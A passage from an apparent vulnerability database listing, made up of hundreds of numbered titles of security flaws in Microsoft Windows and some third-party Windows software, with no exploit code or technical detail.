ZIP Filename Handling Overflow DoS [59736] Microsoft Windows Media Player (WMP) on Solaris Installation Permission Weakness Local Privilege Escalation [59734] Microsoft Windows Log Clearning Function Admin Notification Weakness [59733] Microsoft Windows 2000 Terminal Services Screensaver Screen Minimization Locking Weakness [59732] Microsoft Windows Screensaver Domain Account Lock Verification Local Brute Force Weakness [59731] Microsoft Windows 2000 DCOM Client Alter Context Request Remote Information Disclosure [59730] Microsoft Windows 2000 Terminal Services Disconnect Feature Local Privilege Escalation [59515] Microsoft Windows csrss.exe Command Prompt Input Manipulation Forced Reboot DoS [59514] Microsoft Windows 2000 Task Manager Uppercase Process Name Termination Weakness [59513] Microsoft Windows NT winnt/system32 Write Access Local DoS (NT4ALL) [59509] Microsoft Windows 2000 Encrypted File System Cleartext Backup File Local Disclosure [59347] Microsoft Windows SYSKEY Registry EFS Startup Key Disclosure [59346] Microsoft Windows 2000 Crafted TCP/UDP Traffic CPU Consumption Remote DoS [59340] Microsoft Windows NT Logon Box Account Name Disclosure [59333] Microsoft Windows NT Winlogon Key Local Shutdown DoS [59325] Microsoft Windows NT Scheduler Drive Mapping Permission Weakness Local Privilege Escalation [59264] Microsoft Windows Crafted Fragmented Packet Stream Remote DoS (Jolt) [59260] Microsoft Windows NT SNMP Agent Query Saturation Remote DoS [59250] Microsoft Windows NT Fragmented Packet Handling Remote DoS (ntfrag) [59241] Microsoft Windows CreateRemoteThread Function Arbitrary Writeable Process Termination DoS [58876] Microsoft Windows SMB Packet Command Value Handling Remote Code Execution [58875] Microsoft Windows SMBv2 Packet Handling Infinitie Loop Remote DoS [58862] Microsoft Windows LSASS Malformed NTLM Authentication Packets Remote Overflow DoS [58861] Microsoft Windows Kernel Exception Handler Unspecified Local DoS [58860] Microsoft Windows Kernel User Mode PE File Handling NULL Dereference Local Privilege Escalation [58859] Microsoft Windows Kernel 64-bit Value Conversion Truncation Local Privilege Escalation [58856] Microsoft Windows CryptoAPI X.509 Certificate Object Identifier Handling Overflow Spoofing Weakness [58855] Microsoft Windows CryptoAPI X.509 Certificate Common Name Null Truncation Spoofing [58854] Microsoft Windows Indexing Service ActiveX Memory Corruption Arbitrary Code Execution [58845] Microsoft Windows Media Runtime Compressed Audio File Handling Heap Corruption Arbitrary Code Execution [58844] Microsoft Windows Media Player ASF Runtime Voice Sample Rate Handling Arbitrary Code Execution [58843] Microsoft Windows Media Player ASF Handling Overflow [58786] Microsoft Windows User Profile Unloading Session Persistence Weakness [58785] Microsoft Windows MFC Component (MFC42u.dll) AfxOleSetEditMenu Function RTF Malformed OLE Object Handling Overflow [58656] Trend Micro ServerProtect for Windows EarthAgent.exe Multiple RPC Functions Remote Overflow [57806] Microsoft Windows Wireless LAN AutoConfig Service (wlansvc) Frame Parsing Arbitrary Code Execution [57803] Microsoft Windows Media MP3 File Handling Memory Corruption [57802] Microsoft Windows Media ASF Header Parsing Invalid Free Arbitrary Code Execution [57799] Microsoft Windows srv2.sys Kernel Driver SMB2 Malformed NEGOTIATE PROTOCOL REQUEST Remote DoS [57798] Microsoft Windows DHTML Editing Component ActiveX Arbitrary Code Execution [57797] Microsoft Windows TCP/IP Orphaned Connection Handling Remote DoS [57796] Microsoft Windows TCP/IP Packet State Information Handling Remote Code Execution [57795] Microsoft Windows TCP/IP Implementation Queue Connection Saturation TCP State Table Remote DoS [57016] Microsoft Windows win32k.sys Embedded OpenType Font Handling DoS [56912] Microsoft Windows Terminal Services Client ActiveX Unspecified Overflow [56909] Microsoft Windows AVI Media File Parsing Unspecified Overflow [56908] Microsoft Windows Malformed AVI Header Parsing Arbitrary Code Execution [56904] Microsoft Windows Telnet NTLM Credential Reflection Remote Access [56902] Microsoft Windows Workstation Service NetrGetJoinInformation Function Local Memory Corruption Arbitrary Code Execution [56901] Microsoft Windows Message Queuing Service (MSMQ) mqac.sys IOCTL Request Parsing Local Privilege Escalation [56900] Microsoft Windows Internet Name Service (WINS) Network Packet Handling Remote Integer Overflow [56899] Microsoft Windows Internet Name Service (WINS) Push Request Handling Remote Overflow [56780] Microsoft Windows win32k.sys NtUserConsoleControl Function Memory Manipulation Local Privilege Escalation [56516] Microsoft Windows lpCmdLine Filename Whitespace Handling Weakness [56514] Microsoft Windows gzip Libraries Unspecified Remote Code Execution [56513] Microsoft Windows Autorun / NoDriveTypeAutoRun Registry Value Enforcement Weakness [55843] Microsoft Windows Embedded OpenType (EOT) Font Name Tables Parsing Overflow [55842] Microsoft Windows Embedded OpenType (EOT) Font Data Record Parsing Overflow [55645] Microsoft Windows Live Messenger (WLM) msnmsgr.exe Malformed Content-Type Header Remote DoS [55644] Microsoft Windows Live Messenger Client MSN Protocol over NAT Multiple Header Field Internal IP Disclosure [55332] Microsoft Windows PPTP Server (Raspptpe.sys) Malformed Control Packet Remote DoS [55309] Microsoft Windows ICMP Type 9 Packet Remote DoS [55227] CA ARCserve Backup for Windows Message Engine 0x3B Message Invalid Stub Data RPC Marshalling Error Remote DoS [55050] Microsoft Windows win32k.sys Thread Handling Local Race Condition DoS [54961] Microsoft Office PowerPoint Freelance Windows Translator (FL21WIN.DLL) Layout Parsing Overflow [54943] Microsoft Windows Kernel Desktop Parameter Manipulation Local Privilege Escalation [54942] Microsoft Windows Kernel Driver Class Registration Local Privilege Escalation [54941] Microsoft Windows Kernel User Mode Pointer Passing Local Privilege Escalation [54940] Microsoft Windows Kernel Desktop Object Manipulation Local Privilege Escalation [54939] Microsoft Office Works for Windows File Converter .wps Handling Overflow [54938] Microsoft Windows Active Directory Crafted LDAP(S) Request Handling Remote DoS [54937] Microsoft Windows Active Directory Crafted LDAP(S) Request Hexdecimal DN AttributeValue Handling Arbitrary Code Execution [54935] Microsoft Windows MSHTML Search Preview Display Information Disclosure [54933] Microsoft Windows Print Spooler Crafted Separator Page Arbitrary Local File Disclosure [54932] Microsoft Windows Print Spooler win32spl.dll EnumeratePrintShares Function Remote Overflow [54931] Microsoft Windows SystemParametersInfo() Function SPI_*DESKWALLPAPER Call Local DoS [54191] Microsoft Windows GDI+ PNG File Handling Infinite Loop DoS [53804] Microsoft Windows Media Player MID File Handling Overflow DoS [53668] Microsoft Windows ThreadPool ACL Enforcement Weakness Local Privilege Escalation [53666] Microsoft Windows Management Instrumentation (WMI) Service Isolation Local Privilege Escalation [53623] Microsoft Windows SearchPath File Open / Locating Unspecified Arbitrary Code Execution [53621] Microsoft Windows HTTP Services Digital Certificate Distinguished Name Mismatch Weakness [53620] Microsoft Windows HTTP Services Web Server Response Unspecified Integer Underflow [53619] Microsoft Windows HTTP Services NTLM Credential Replay Privileged Code Execution [53533] Microsoft Windows Task Manager (taskmgr.exe) I/O Activity Local Information Disclosure [53309] Microsoft Windows WINS 1Ch Registration Domain Controller Manipulation [53248] Microsoft Windows DNS Server Crafted Packets Remote Memory Consumption DoS [52892] Microsoft IE on Windows Link Click Unspecified Arbitrary Code Execution (PWN2OWN) [52694] Microsoft Windows Media Player Malformed GET Request DoS [52693] Microsoft Windows Mobile Bluetooth Stack OBEX FTP Service Traversal Arbitrary File Manipulation [52685] Microsoft Windows FTP Client Multiple Command Overflows [52683] Microsoft Windows explorer.exe Malformed PNG Handling DoS [52682] Microsoft Windows Explorer ZIP Handler DoS [52681] Microsoft Windows Firewall sessmgr.exe Port Restriction Local Bypass [52524] Microsoft Windows Invalid Pointer Local Privilege Escalation [52523] Microsoft Windows Handle Validation Local Privilege Escalation [52522] Microsoft Windows GDI Kernel Component Unspecified Remote Code Execution [52521] Microsoft Windows SChannel Certificate Based Authentication Spoofing Bypass [52520] Microsoft Windows WPAD WINS Server Registration Web Proxy MiTM Weakness [52519] Microsoft Windows DNS Server WPAD Registration Dynamic Update MiTM Weakness [52518] Microsoft Windows DNS Server Response Response Validation Transaction ID Prediction Weakness [52517] Microsoft Windows DNS Server Query Validation Spoofing [51433] Microsoft Windows Crafted CHM File Handling Overflow [51133] Microsoft Windows Media Player Multiple File Handling Remote Overflow [50567] Microsoft Windows WordPad Text Converter Unspecified Memory Corruption [50566] Microsoft Windows Explorer search-ms Protocol Handler Arbitrary Code Execution [50565] Microsoft Windows Explorer Saved Search File Handling Arbitrary Code Execution [50562] Microsoft Windows GDI WMF Image Size Parameter Parsing Overflow [50561] Microsoft Windows GDI WMF Image Parsing Integer Math Overflow [50559] Microsoft Windows Media Component Crafted ISATAP Address NTLM Credential Disclosure [50558] Microsoft Windows Media Component Service Principal Name (SPN) Credential Reflection Arbitrary Code Execution [50533] Microsoft Windows Media Services nskey.dll ActiveX CallHTMLHelp Method Overflow [50287] Microsoft Windows Vista iphlpapi.dll CreateIpForwardEntry2() Function Memory Corruption [50280] Microsoft Windows UnhookWindowsHookEx Call Saturation Race Condition Local DoS [50252] Microsoft Windows Media Player Crafted DAT File MThd Header Handling DoS [50251] Microsoft Windows Media Player Crafted MIDI File MThd Header Handling DoS [50000] Microsoft Windows Active Directory LDAP Server Bind Request User Account Enumeration [49897] Microsoft Windows Explorer Crafted ZIP File Handling DoS [49895] Microsoft Windows GDI+ gdiplus.dll Crafted ICO File Handling DoS [49736] Microsoft Windows SMB NTLM Authentication Credential Replay Remote Code Execution [49364] Cisco PIX / ASA Microsoft Windows NT VPN Domain Authentication Bypass [49068] Microsoft Host Integration Server (HIS) SNA RPC Request Remote Overflow [49061] Microsoft Windows Ancillary Function Driver (afd.sys) Local Privilege Escalation [49058] Microsoft Windows Active Directory LDAP(S) Request Handling Remote Overflow [49057] Microsoft Windows SMB File Name Handling Remote Underflow [49056] Microsoft Windows Kernel Memory Corruption Local Privilege Escalation [49055] Microsoft Windows Kernel New Window Creation Process Arbitrary Code Execution [49054] Microsoft Windows Kernel Double-free Unspecified Local Privilege Escalation [49053] Microsoft Windows Virtual Address Descriptors (VAD) Local Privilege Escalation [48837] Microsoft Windows Vista Page Fault Handling DoS [48789] Microsoft Windows Mobile Bluetooth Device Name Overflow DoS [48359] Microsoft Windows Vista ASLR / DEP Memory Protection Bypass [48302] Microsoft Windows nslookup.exe DNS Zone Transfer Request Unspecified Arbitrary Code Execution [48153] Microsoft Windows srv.sys WRITE_ANDX SMB Packet Handling Remote DoS [48037] Microsoft Windows Image Acquisition Logger ActiveX Open Method Arbitrary File Download [48009] Microsoft Windows Kernel IopfCompleteRequest API Overflow [47963] Microsoft Windows Media Player Audio File Sampling Rate Remote Code Execution [47962] Microsoft Windows Media Encoder wmex.dll ActiveX Overflow [47412] Microsoft Windows Event System Crafted Request Array Index Handling Remote Privilege Escalation [47411] Microsoft Windows Event System Per-user Subscription Crafted Request Remote Privilege Escalation [47403] Microsoft Windows Messenger ActiveX (Messenger.UIAutomation.1) Remote Privileged Operations [47396] Microsoft Windows IPsec Policy Import Failure Cleartext Remote Information Disclosure [47395] Microsoft Windows Image Color Management System (MSCMS) mscms.dll InternalOpenColorProfile Function ICM Image File Handling Overflow [46990] Microsoft Windows Explorer (explorer.exe) Unspecified WMF Handling DoS [46801] Microsoft Windows Calendar Malformed ICS File Handling DoS [46778] Microsoft Windows DNS Query ID Field Prediction Cache Poisoning [46777] Microsoft Windows DNS Socket Entropy Weakness Cache Poisoning [46774] Microsoft Windows Explorer Saved Search File Handling DoS [46210] Microsoft Windows Installer msiexec.exe /uninstall Option GUID Value Overflow [46068] Microsoft Windows Pragmatic General Multicast (PGM) Fragment Handling Remote DoS [46067] Microsoft Windows Pragmatic General Multicast (PGM) Packet Handling Remote DoS [46066] Microsoft Windows Active Directory LDAP Request Processing Remote DoS [46063] Microsoft Windows Internet Name Service (WINS) Packet Handling Local Privilege Escalation [46062] Microsoft Windows Speech Components (sapi.dll) Speech Recognition Code Execution [46061] Microsoft Windows Bluetooth SDP Packet Processing Remote Code Execution [45809] Microsoft Windows Vista Kernel Unspecified Remote Issue [45523] Microsoft Windows Live Messenger GDI Engine Malformed File Handling Overflow [45521] Microsoft Windows Explorer (explorer.exe) Malformed PNG Handling Remote DoS [45280] Microsoft Windows Media Player (WMP) mplay32.exe MP3 Filename Handling Local Overflow [45048] Microsoft Windows XP I2O Utility Filter Driver (i2omgmt.sys) Local Privilege Escalation [44975] Microsoft Windows CE GIF Imaging Component Unspecified Arbitrary Code Execution [44974] Microsoft Windows CE JPEG (GDI+) Handling Unspecified Arbitrary Code Execution [44880] Microsoft Windows msjet40.dll MDB File Handling Overflow [44580] Microsoft Windows Microsoft Distributed Transaction Coordinator (MSDTC) SeImpersonatePrivilege User Right Local Privilege Escalation [44318] Trend Micro ServerProtect for Windows (SpntSvc.exe) StRpcSrv.dll Arbitrary Remote Code Execution [44215] Microsoft Windows GDI EMF Filename Parameter Handling Overflow [44214] Microsoft Windows GDI WMF Handling CreateDIBPatternBrushPt Function Overflow [44213] Microsoft Windows GDI (gdi32.dll) EMF File Handling Multiple Overflows [44206] Microsoft Windows Kernel Unspecified Privilege Escalation [44200] Microsoft Windows Random Number Generator (RNG) CryptGenRandom Function Prediction Weakness [44172] Microsoft Windows DNS Client Predictable Transaction ID Spoofing [44171] Microsoft Windows HxTocCtrl ActiveX (hxvz.dll) Memory Corruption [44018] Microsoft Windows Vista SP1 Page Protection Unspecified Bypass [43773] Microsoft Windows Explorer (explorer.exe) GIF File Handling Remote DoS [43715] Microsoft Windows Media Player (WMP) AIFF File Handling DoS [43603] Microsoft Windows DNS Server Dynamic Update Mechanism Client Authentication Bypass [43434] Microsoft Windows Vista NoDriveTypeAutoRun Auto-Play Bypass [43307] Microsoft Windows Explorer (explorer.exe) AVI Handling Right-Click Action DoS [42579] 3ivx MPEG-4 on Microsoft Windows Media Player (WMP) mplayer2.exe MP4 File Handling Overflow [41628] IBM Informix Storage Manager (ISM) Windows RPC Components XDR Library Multiple Unspecified Remote Overflows [41553] Microsoft Windows Explorer BMP Width Dimension Handling Overflow [41491] Microsoft Windows Vista Crafted DHCP Response DoS [41463] Microsoft Windows OLE Automation Unspecified Memory Corruption Remote Code Execution [41156] Microsoft Windows x64 Kernel PatchGuard Bypass [41155] Microsoft Windows Hardware-enforced DEP Bypass [41154] Microsoft Windows XP EFS Cleartext Password Storage [41097] Microsoft Windows Task Scheduler (at.exe) Local Privilege Escalation [41093] Microsoft Windows Media Player (WMP) MSIE Static Invocation HTML Rendering Weakness [41092] Microsoft Windows DNS Service Predictable Transaction ID Weakness [41090] Microsoft Windows w/ IE7 Shell32.dll Crafted URL Third-party Application Arbitrary Command Execution [41065] Microsoft Windows kernel32.dll Multiple Function DoS [41064] Microsoft Windows ntdll.dll Multiple Function DoS [41059] Microsoft Windows ARP Saturation Remote DoS [40071] Microsoft Windows LSASS Crafted LPC Request Local Privilege Escalation [40070] Microsoft Windows TCP/IP IGMPv3 / MLDv2 Packet Handling Remote Code Execution [40069] Microsoft Windows TCP/IP ICMP RDP Packet Handling Remote DoS [39751] Trend Micro ServerProtect for Windows (SpntSvc.exe) StRpcSrv.dll Multiple Function Remote Overflow [39750] Trend Micro ServerProtect for Windows Agent Service RPCFN_CopyAUSrc Function Remote Overflow [39521] Cisco Security Agent for Microsoft Windows Crafted SMB Packet Remote Overflow [39131] Microsoft Windows Media Player Crafted AU File Application Crash Remote DoS [39127] Microsoft Windows DirectX WAV / AVI File Parsing Arbitrary Code Execution [39126] Microsoft Windows DirectX SAMI File Parsing Arbitrary Code Execution [39125] Microsoft Windows Vista SMBv2 Signing Unspecified Remote Code Execution [39124] Microsoft Windows Vista Kernel Legacy Reply Path Validation Local Privilege Escalation [39123] Microsoft Windows Message Queuing MSMQ Message Handling Arbitrary Code Execution [39122] Microsoft Windows Media Format Runtime ASF Parsing Arbitrary Code Execution [39014] Microsoft Windows RunAs Command Local Arbitrary Process DoS [38991] Microsoft Windows PNG Image IHDR block Multiple Crafted Value Remote DoS [38499] Microsoft Windows Mobile ActiveSync USB Weak PIN/Password Encryption [38494] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) ICO Handling DoS [37637] Microsoft Windows Crafted HLP File Overflow [37635] Microsoft Windows Virtual DOS Machine (VDM) PhysicalMemory Race Condition Local Privilege Escalation [37631] Microsoft Windows Malformed NNTP Response Remote Memory Corruption [37627] Microsoft Windows Kodak Image Viewer Image File Handling Arbitrary Code Execution [37105] Microsoft Windows mfc42.dll / mfc42u.dll CFileFind Class FindFile() Function Overflow [36938] Microsoft Windows XP Kernel Process Scheduler Local DoS [36937] Microsoft Windows / IE ActiveX (triedit.dll) Multiple Property NULL Pointer DoS [36935] Microsoft Windows Services for UNIX Local Privilege Escalation [36393] Microsoft Windows Vista Weather Gadgets Crafted HTML Attribute Unspecified Issue [36392] Microsoft Windows Vista Contacts Gadget Crafted Contact Information Arbitrary Code Execution [36391] Microsoft Windows Vista Feed Headlines Gadgets RSS Feed XSS [36390] Microsoft Windows Vector Markup Language (VML) VGX.DLL CDownloadSink Class Overflow [36388] Microsoft Windows Graphics Rendering Engine (GDI) Metafile Image Handling Overflow [36387] Microsoft Windows OLE Automation TextNode Object substringData Method Overflow [36386] Microsoft Windows Media Player Skin File Handling Crafted Header Arbitrary Code Execution [36385] Microsoft Windows Media Player Skin File Handling Overflow [36149] Microsoft IE on Windows Mobile Unspecified Overflow DoS [36148] Microsoft Windows Mobile Pictures and Videos Malformed JPEG DoS [36146] Microsoft Windows Terminal Services TLS Downgrade Weakness [36145] Microsoft Windows Event Viewer (eventvwr.exe) Log Data Exclusion [36144] Microsoft Windows Bluetooth Unspecified Remote Privilege Escalation [36143] Microsoft Windows Mobile Pocket PC Edition Unspecified Remote Privilege Escalation [36141] Microsoft Windows Explorer Ole32.dll Crafted Document Summary Information DoS [36138] Microsoft Windows Active Directory Time Restriction User Enumeration [36111] Symantec Backup Exec for Windows RPC Crafted ncacn_ip_tcp Request Remote Overflow [35962] Microsoft Windows XP Registry QHEADLES Permission Weakness [35961] Microsoft Windows Active Directory LDAP Service Crafted Request Remote DoS [35960] Microsoft Windows Active Directory LDAP Service Convertible Attribute Remote Code Execution [35952] Microsoft Windows Vista Teredo Crafted IPv6 Traffic Blocking Rule Bypass [35637] Microsoft Windows Unspecified Remote Code Execution [35347] Microsoft Windows Schannel Security Package Crafted Digital Signature Arbitrary Code Execution [35346] Microsoft Outlook Express / Windows Mail MHTML Content Disposition Parsing Cross Domain Information Disclosure [35345] Microsoft Outlook Express / Windows Mail URL Parsing Cross Domain Information Disclosure [35344] Microsoft Windows Vista Local User Information Data Stores Information Disclosure [35341] Microsoft Windows Win32 API Unspecified Remote Code Execution [34490] Microsoft Windows Explorer Folder Browsing WMV Handling DoS [34103] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) DNS Subversion [34102] Microsoft Windows Vista Mail Client Crafted Link Arbitrary Program Execution [34101] Microsoft Windows XP winmm.dll mmioRead Function DoS [34099] Microsoft Windows TrueType Fonts Rasterizer Local Privilege Escalation [34098] Microsoft Windows GDI Functions Windows Metafile (WMF) Handling DoS [34097] Microsoft Windows GDI Enhanced Metafile (EMF) Handling Local Privilege Escalation [34096] Microsoft Windows GDI Invalid Window Size Local Privilege Escalation [34095] Microsoft Windows GDI Crafted Image Local Privilege Escalation [34011] Microsoft Windows Kernel Mapped Memory Local Privilege Escalation [34010] Microsoft Windows XP UPnP Remote Memory Corruption [34009] Microsoft Windows Agent URL Parsing Memory Corruption [34008] Microsoft Windows Vista CSRSS Local Privilege Escalation [33668] Microsoft Windows Vista Meeting Space DFSR.exe TCP Connection Persistence [33667] Microsoft Windows Vista Persistent Established Teredo Address [33666] Microsoft Windows Vista Teredo nonce Spoofing [33665] Microsoft Windows Vista Neighbor Discovery Crafted Neighbor Advertisement Redirect [33664] Microsoft Windows Vista Crafted Gratuitous ARP Overwrite DoS [33663] Microsoft Windows Vista LLTD Mapper HELLO Packet Spoofing [33662] Microsoft Windows Vista LLTD Mapper Real Source Field Host Spoofing [33661] Microsoft Windows Vista LLTD Responder Race Condition Host Spoofing [33660] Microsoft Windows Vista LLTD Mapper EMIT Packet Gathering Remote DoS [33635] AMD ATI Radeon for Microsoft Windows Vista atikmdag.sys Kernel Mode Driver DoS [33628] Microsoft Windows NDISTAPI.sys Permission Weakness Local DoS [33474] Microsoft Windows ReadDirectoryChangesW API Function File System Information Disclosure [33307] Microsoft Windows Media MID Malformed Header Chunk DoS [33306] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [33219] Microsoft Windows Live Messenger Gestual Emoticon Saturation CPU Consumption DoS [32629] Microsoft IE on Windows Mobile Malformed WML Page Unspecified DoS [32628] Microsoft Windows / IE ActiveX (mshtml.dll) Multiple Property NULL Pointer DoS [31897] Microsoft Windows CSRSS NtRaiseHardError Function Arbitrary Memory Disclosure [31890] Microsoft Windows Shell New Hardware Local Privilege Escalation [31889] Microsoft Windows XP SP2 Image Aquisition Service Local Privilege Escalation [31885] Microsoft Windows OLE Dialog Memory Corruption Remote Code Execution [31884] Microsoft Windows HTML Help ActiveX Control Arbitrary Code Execution [31659] Microsoft Windows CSRSS MessageBox Function Privilege Escalation [31645] Microsoft Windows DNS Recursive Query DoS [30997] Microsoft Windows .manifest File Handling Local DoS [30871] Microsoft Windows DRM drmstor.dll ActiveX Object StoreLicense Function Memory Corruption [30821] Microsoft Outlook Express Windows Address Book Contact Record Code Execution [30819] Microsoft Windows Media Player ASX Playlist Handling Overflow [30818] Microsoft Windows Media Player ASF Parsing Overflow [30817] Microsoft Windows Remote Installation Service TFTP Arbitrary File Overwrite [30811] Microsoft Windows SNMP Service Remote Overflow [30405] Microsoft Windows Active Directory Unspecified DoS [30263] Microsoft Windows Workstation Service Crafted Message Remote Overflow [30262] Microsoft Windows Agent ACF File Handling Memory Corruption [30261] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote DoS [30260] Microsoft Windows Client Service for NetWare (CSNW) Crafted Message Remote Code Execution [30214] Microsoft Windows GDI Kernel Structure Modification Code Execution [30096] Microsoft Windows NAT Helper Components ipnathlp.dll with ICS Malformed DNS Query DoS [29529] Microsoft Windows 2000 creator.dll ActiveX COM Object Memory Corruption [29528] Microsoft Windows 2000 msdxm.ocx ActiveX COM Object Memory Corruption [29527] Microsoft Windows 2000 myinfo.dll ActiveX COM Object Memory Corruption [29526] Microsoft Windows 2000 ciodm.dll ActiveX COM Object Memory Corruption [29439] Microsoft Windows Server Service Crafted SMB Packet Unspecified Issue [29424] Microsoft Windows Object Packager File Extension Dialog Spoofing [29409] Microsoft Windows TCP 135 Crafted Packet Saturation DoS [29351] Microsoft Windows Terminal Services tsuserex.dll COM Object Instantiation [29231] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Arbitrary Code Execution [29128] Microsoft Windows gdiplus.dll Divide-by-zero DoS [28731] Microsoft Windows Pragmatic General Multicast (PGM) Multicast Message Arbitrary Code Execution [28729] Microsoft Windows Indexing Service Unspecified XSS [28372] Microsoft Windows Explorer URL Passing Recursive file Tag Local DoS [28208] Microsoft Windows Live Messenger Contact List .ctt File Heap Overflow [27848] Microsoft Windows Kernel Unspecified Local Privilege Escalation [27847] Microsoft Windows Unhandled Exception Unspecified Remote Code Execution [27846] Microsoft Windows Winlogon Search Path Subversion Local Privilege Escalation [27844] Microsoft Windows DNS Client Service Record Response Overflow [27843] Microsoft Windows Winsock API Hostname Remote Code Execution [27797] Microsoft Windows GDI library (gdi32.dll) createBrushIndirect Function WMF Parsing DoS [27644] Microsoft Windows Server Driver (srv.sys) Crafted SMB Packet NULL Dereference DoS [27155] Microsoft Windows Server Service SRV.SYS Crafted Request SMB Information Disclosure [27154] Microsoft Windows Server Service SRV.SYS First-class Mailslot Message Remote Overflow [27152] Microsoft Windows IIS ASP Page Processing Overflow [27151] Microsoft Windows DHCP Client Service Crafted Response Overflow [26440] Microsoft Windows SMB MrxSmbCscIoctlOpenForCopyChunk Function Overflow [26439] Microsoft Windows SMB MRXSMB.SYS MrxSmbCscIoctlCloseForCopyChunk Remote DoS [26437] Microsoft Windows RRAS RASMAN Remote Overflow [26433] Microsoft Windows TCP/IP Protocol Driver Source Routing Overflow [26432] Microsoft Windows jgdw400.dll ART Image Rendering Overflow [26431] Microsoft Windows Graphics Rendering Engine PolyPolygon Function Overflow [26430] Microsoft Windows Media Player PNG Processing Overflow [25949] Microsoft Windows INETCOMM.DLL mhtml: URI Overflow [25761] Microsoft Windows NTDLL.DLL RtlDosPathNameToNtPathName_U API Path Conversion Weakness [25501] Microsoft Windows itss.dll CHM Processing Overflow [25429] Novell Client for Windows DPRPC library (DPRPCW32.DLL) ndps_xdr_array Function Remote Overflow [25336] Microsoft Windows Distributed Transaction Coordinator (DTC) BuildContextW Request DoS [24802] Microsoft Windows Help winhlp32.exe Embedded Image Processing Overflow [24519] Microsoft Outlook Express Windows Address Book (.wab) Processing Overflow [24516] Microsoft Windows Explorer COM Object Handling Remote Code Execution [23136] Microsoft Windows/Office Korean Input Method Editor (IME) ShellAbout() Privilege Escalation [23134] Microsoft Windows Web Client Service Crafted WebDAV Request Overflow [23133] Microsoft Windows IGMPv3 Crafted Packet Remote DoS [23132] Microsoft Windows Media Player Plug-in Malformed EMBED Element Arbitrary Code Execution [23131] Microsoft Windows Media Player Bitmap File Processing Overflow [23047] Microsoft Windows SSDP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23046] Microsoft Windows SCardSvr SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23045] Microsoft Windows NetBT SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23044] Microsoft Windows UPnP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [22710] Microsoft Windows Ad-hoc Network Advertisement Weakness [22697] Microsoft Windows Unspecified Display Driver Large Image Processing DoS [22396] Microsoft Windows WMF Processing ExtEscape POSTSCRIPT_INJECTION Function Overflow DoS [22371] Microsoft Windows WMF Processing ExtCreateRegion Function Overflow DoS [21987] Microsoft Windows Shimgvw.dll SETABORTPROC Function Crafted WMF Arbitrary Code Execution [21598] Microsoft Windows 2000 NetBIOS Port Malformed TCP Packet Parsing Remote DoS [21536] Microsoft Windows backup File Name Extension Overflow [21510] Microsoft Windows SynAttackProtect Bypass [20916] Microsoft Windows UPnP GetDeviceList Remote DoS [20875] Microsoft Windows XP Professional Upgrade MSIE Rollback [20580] Microsoft Windows GetEnhMetaFilePaletteEntries() EMF File Rendering DoS [20579] Microsoft Windows GDI Metafile SetPalette Entries Overflow [20497] Microsoft Windows 98SE User32.dll Icon DoS [20367] Microsoft Windows XP Fast User Switching Arbitrary Account Lockout [20366] Microsoft Windows XP Remote Desktop Client Cleartext Account Name Transmission [20364] Microsoft Windows keybd_event Validation Privilege Escalation [20356] Microsoft Windows Win32k.sys ShowWindow Function Local DoS [20279] Microsoft Windows ME ssdpsrv.exe Crafted SSDP Message DoS [20256] Microsoft Windows 2000 NTFS Volume Macintosh Client Directory Permission Modification [20222] Microsoft Windows 2000 runas.exe Named Pipe Spoofing Information Disclosure [20221] Microsoft Windows 2000 runas.exe Named Pipe Single Thread DoS [20220] Microsoft Windows 2000 runas.exe Cleartext Authentication Information Disclosure [20188] Microsoft Windows Crafted SMB SMBnegprots Request DOS [20148] Microsoft Windows smbmount Directory Manipulation Saturation DoS [20028] Microsoft Windows XP SP2 TFTP Local Overflow [20002] Microsoft Windows 2000 CHKDSK Fix Mode File ACL Failure [20001] Microsoft Windows 2000 Terminal Service Client Connection IP Logging Failure [20000] Microsoft Windows 2000 Domain Administrator Computer Lock Bypass [19999] Microsoft Windows 2000 FQDN Domain Login Password Expiry Bypass [19998] Microsoft Windows 2000 UPN Credentialed Login Group Policy Failure [19997] Microsoft Windows 2000 WideCharToMultiByte Function String Termination Issue [19996] Microsoft Windows 2000 Event ID 1704 Group Policy Failure [19995] Microsoft Windows 2000 SECEDIT Long Folder ACL Set Issue [19994] Microsoft Windows 2000 audit directory service access 565 Event Logging Failure [19993] Microsoft Windows 2000 LDAPS CA Trust Issue [19922] Microsoft Windows Client Service for NetWare (CSNW) Remote Overflow [19904] Microsoft Windows DTC Packet Relay DoS [19903] Microsoft Windows DTC Transaction Internet Protocol (TIP) DoS [19902] Microsoft Windows COM+ Remote Code Execution [19901] Microsoft Windows FTP Client Arbitrary File Write [19900] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2122) [19899] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2118) [19898] Microsoft Windows Web View Arbitrary Script Injection [19873] Microsoft Windows XP Wireless Zero Configuration Credential/Key Disclosure [19857] Microsoft Windows SeDebugPrivilege NtSystemDebugControl Function Privilege Escalation [19775] Microsoft Windows XP ISAKMP UDP Saturation DoS [19764] Microsoft Windows XP Malformed explorer.exe.manifest Local DoS [19287] Microsoft Windows Firewall Malformed Registry Entry Ruleset Exception Weakness [19187] Microsoft Windows NT/2000 DNS Server Non-delegated NS Glue Record Cache Poisoning [19185] Microsoft Windows XP Internet Connection Firewall sessmgr.exe Accss Control Bypass [19007] Microsoft Windows 95 smbclient Triple Dot Traversal Arbitrary Command Execution [19006] Microsoft Windows NT snmp.exe Malformed OID Packet Saturation DoS [18956] Microsoft Windows Registry Editor (Regedt32.exe) Long String Obfuscation [18830] Microsoft Windows UMPNPMGR wsprintfW Remote Overflow [18829] Microsoft Windows Open Type (EOT) Font Handling Remote Overflow [18828] Microsoft Windows Distributed Transaction Coordinator (DTC) Memory Modification Remote Code Execution [18824] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050627) [18823] Microsoft Windows Kernel APC Queue Manipulation Local Privilege Escalation [18821] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050505) [18820] Microsoft Windows GDI EMF/WMF Metafile Processing Multiple Overflows [18730] Microsoft Windows XP SP1 Raw IP Empty Datagram DoS [18729] Microsoft Windows SNMP LAN Manager (LANMAN) MIB Extension GET/NEXT Request DoS [18728] Microsoft Windows QueryIpMatching Weakness 